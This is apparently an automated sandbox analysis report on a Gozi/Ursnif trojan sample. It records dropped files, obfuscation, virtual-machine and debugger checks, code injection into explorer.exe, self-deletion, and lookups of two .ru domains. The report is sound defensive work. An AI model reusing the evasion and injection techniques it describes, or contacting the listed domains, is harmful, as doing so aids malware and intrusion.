Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_00401991 0_2_00401991
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_00410C30 0_2_00410C30
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_00411A10 0_2_00411A10
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_00401991 4_2_00401991
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_00410C30 4_2_00410C30
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_00411A10 4_2_00411A10
Source: C:\Users\user\AppData\Local\Temp\3196.exe Code function: 5_2_00E07C88 5_2_00E07C88
Source: C:\Users\user\AppData\Local\Temp\3196.exe Code function: 5_2_00E08558 5_2_00E08558
Source: C:\Users\user\AppData\Local\Temp\3196.exe Code function: 5_2_00E07940 5_2_00E07940
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004382FC 6_2_004382FC
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00432DCC 6_2_00432DCC
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00432792 6_2_00432792
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\cqu7x.exe Code function: String function: 0040CCD0 appears 31 times
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: String function: 0040CCD0 appears 31 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_004018F5 Sleep,NtTerminateProcess, 0_2_004018F5
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_00401900 Sleep,NtTerminateProcess, 0_2_00401900
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_0040190B Sleep,NtTerminateProcess, 0_2_0040190B
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_00401912 Sleep,NtTerminateProcess, 0_2_00401912
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_00401920 Sleep,NtTerminateProcess, 0_2_00401920
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_004018F4 Sleep,NtTerminateProcess, 0_2_004018F4
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_004018F5 Sleep,NtTerminateProcess, 4_2_004018F5
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_00401900 Sleep,NtTerminateProcess, 4_2_00401900
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_0040190B Sleep,NtTerminateProcess, 4_2_0040190B
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_00401912 Sleep,NtTerminateProcess, 4_2_00401912
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_00401920 Sleep,NtTerminateProcess, 4_2_00401920
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_004018F4 Sleep,NtTerminateProcess, 4_2_004018F4
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 6_2_00401493
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00401D95 GetProcAddress,NtCreateSection,memset, 6_2_00401D95
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00401F78 NtMapViewOfSection, 6_2_00401F78
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_0043737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_0043737C
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00438521 NtQueryVirtualMemory, 6_2_00438521
PE file contains executable resources (Code or Archives)
Source: cqu7x.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: vcivdjd.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\vcivdjd B9FD7622C3FCFDD6EB9B2CB917A3CB64EB35C61221DE4866303CA88D828D5BED
Source: 3196.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: loader_250246_15072022_2203_31102022.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cqu7x.exe ReversingLabs: Detection: 92%
Source: cqu7x.exe Metadefender: Detection: 40%
Source: cqu7x.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cqu7x.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\cqu7x.exe C:\Users\user\Desktop\cqu7x.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\vcivdjd C:\Users\user\AppData\Roaming\vcivdjd
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3196.exe C:\Users\user\AppData\Local\Temp\3196.exe
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe "C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3196.exe C:\Users\user\AppData\Local\Temp\3196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe "C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\vcivdjd Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3196.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/5@3/2
Source: C:\Users\user\AppData\Local\Temp\3196.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00437256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 6_2_00437256
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: cqu7x.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb8hC source: cqu7x.exe, vcivdjd.1.dr
Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb source: cqu7x.exe, vcivdjd.1.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\cqu7x.exe Unpacked PE file: 0.2.cqu7x.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vcivdjd Unpacked PE file: 4.2.vcivdjd.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_004010DE push cs; ret 0_2_004010DF
Source: C:\Users\user\Desktop\cqu7x.exe Code function: 0_2_0040199E push cs; retf 0_2_0040199F
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_004010DE push cs; ret 4_2_004010DF
Source: C:\Users\user\AppData\Roaming\vcivdjd Code function: 4_2_0040199E push cs; retf 4_2_0040199F
Source: C:\Users\user\AppData\Local\Temp\3196.exe Code function: 5_2_00E0A5E0 push eax; retf 5_2_00E0A5E1
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_0043B859 push 0000006Fh; retf 6_2_0043B85C
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_004382EB push ecx; ret 6_2_004382FB
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_00437F00 push ecx; ret 6_2_00437F09
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_0040134F LoadLibraryA,GetProcAddress, 6_2_0040134F
Source: initial sample Static PE information: section name: .text entropy: 7.3931970143179395
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\vcivdjd Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\3196.exe File created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3196.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\vcivdjd Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\cqu7x.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\vcivdjd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking system information)
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\cqu7x.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5464 Thread sleep count: 644 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2348 Thread sleep count: 345 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 2348 Thread sleep time: -34500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5452 Thread sleep count: 411 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5452 Thread sleep time: -41100s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2408 Thread sleep count: 567 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3232 Thread sleep count: 270 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 632 Thread sleep count: 274 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe TID: 2224 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\3196.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 644 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 411 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 567 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\3196.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\Desktop\cqu7x.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe API call chain: ExitProcess graph end node
Source: 3196.exe, 00000005.00000000.450316157.0000000000662000.00000002.00000001.01000000.00000007.sdmp, 3196.exe.1.dr Binary or memory string: #Glb#Hlb#Ilb#7x#Jlb#Klb#Llb#Mlb#Nlb#S#Olb#Plb#Qlb#Rlb#Slb#Tlb#T#U#nLb#W#X#Y#Z#K1#oLb#2#pLb.ctor#ALb#sb#tb#ub#vb#BLb#CLb#DLb#b2#c2#ELb#FLbParameterInfo#Db.cctorobjectmethodInvokesddddffshdjfffffgjskdgsacsafpsfhjfkfhfjsfhdhffadsfssscfgdbdfjfsffafcfdssfkfhgjBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresultffchkffaffsdssfjjffasfcfgsdfsgkffjjcfssafffdsdgkfffffchkfffdafsssfjjffafsffdcssgkffjjcfsfdsafsdgkffffjsfhdgffffdffdkfgfgjjfsgfdfffffffdhfkffdgjhdssdgfddfkshfffdjgdffgkfhfddjsdfdffhdfhsfjfgfhsddfdffhfjfdfdghfffdfkdgdsfhjdfffgdkddfffkshgfsgssddhdffjkffdfkgdsfsdffgfkdhjfdfhgdfjfgjffgfgjfgjhgdgdfjjkjkjjfgjhgdfjkjytfjkjkjjfgjjfghksfsfsdhjjjhgjkdgfddafdafjfsddffddffdhffkadhdsafdfadfdkfffjfsddfffddfdhffkadhdsaffdadfdkffdsdsdffhfffdfsdhkdfhfsdfdsfhffdddkffsjkkfdfhdhfsddfffgkdhfffssddfgdfjdsdhsdfdfkfgfdhhjhgffhddfkshddffgjfsdssfssssahddhfdfkgjddssssssssssssssdfsssssssffsddhfhkfjjdfhfdfdffdffssdkfjhdfffdfhffsassdkfshhdffhdfsdhdffdfkdfaffdssdfsdfffhhfhhsdfffdsshfffsdfdhfhffdsffsfdshfsdhshhhgfdffsfdfsfhsfdfsfhffffdhsfddsfffhssffdsfhdfffhhfdhssfdffsfjhffssfdffdfdhstartupInfokpcSaffdssdfffhhfhhsdfffdsshfffdhfhffdsffdshfsdhshhhgfdfffdfsfhsfdfsfhfffdhsfddsffhssffdhdfffhhfdhsdffsfjhffsdffdfdhiCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType#le#mefsdssffff4gdgdsfsdffsdssfffgdffffffgdsfsdfUnverifiableCodeAttributeSystem.SecurityCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeSuppressIldasmAttributeCompilerGeneratedAttributeAttributeUsageAttributeAttributeTargetsngk.resources{aac12949-fa12-4497-a592-42d1dcf12d48}KeyNotFoundExceptionIndexOutOfRangeExceptionByteRfc2898DeriveBytesCryptoStreamCryptoStreamModeRijndaelManagedMD5CryptoServiceProviderAssemblyBuilderSystem.Reflection.EmitDefineDynamicModuleModuleBuilderDefineTypeTypeBuilderTypeAttributesGetMethodMethodInfoMethodBaseGetParametersFunc`2System.CoreEnumerableSystem.LinqSelectIEnumerable`1get_ReturnTypeDefinePInvokeMethodMethodBuilderMethodAttributesCallingConventionsCallingConventionCharSetGetMethodImplementationFlagsMethodImplAttributesSetImplementationFlagsCreateTypeDelegateCreateDelegateAppDomainget_CurrentDomainAssemblyNameDefineDynamicAssemblyAssemblyBuilderAccessZeroExceptionInt32get_ParameterTypeResolveTypeHandleMemberInfoget_NameResolveMethodHandleRuntimeMethodHandleGetMethodFromHandleget_IsStaticFieldInfoget_FieldTypeEmptyDynamicMethodGetILGeneratorILGeneratorOpCodesLdarg_0OpCodeEmitLdarg_1Ldarg_2Ldarg_3Ldarg_STailcallCallCallvirtRetSetValueGetFieldsBindingFlagsCharGetModulesModuleget_ModuleHandleget_ModuleGetMethodsLdc_I4get_MetadataTokenSubAddTryGetValue
Source: explorer.exe, 00000001.00000000.355555979.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000001.00000000.385847732.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.380989996.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000001.00000000.356179224.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.388700292.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000001.00000000.362750745.000000000856B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586272240.0000000000683000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: explorer.exe, 00000001.00000000.385847732.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: 3196.exe, 00000005.00000002.458833552.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\]
Source: 3196.exe, 00000005.00000000.450316157.0000000000662000.00000002.00000001.01000000.00000007.sdmp, 3196.exe.1.dr Binary or memory string: jdfffgdkddfffkshgfs

Anti Debugging
barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\cqu7x.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe Code function: 6_2_0040134F LoadLibraryA,GetProcAddress, 6_2_0040134F
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\cqu7x.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3196.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: vcivdjd.1.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: dindunketagestan.ru
Source: C:\Windows\explorer.exe Domain query: kukaryka.ru
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\cqu7x.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\cqu7x.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\cqu7x.exe Thread created: C:\Windows\explorer.exe EIP: 2B21A0C Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcivdjd Thread created: unknown EIP: 2B41A0C Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\3196.exe Process created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe "C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe" Jump to behavior
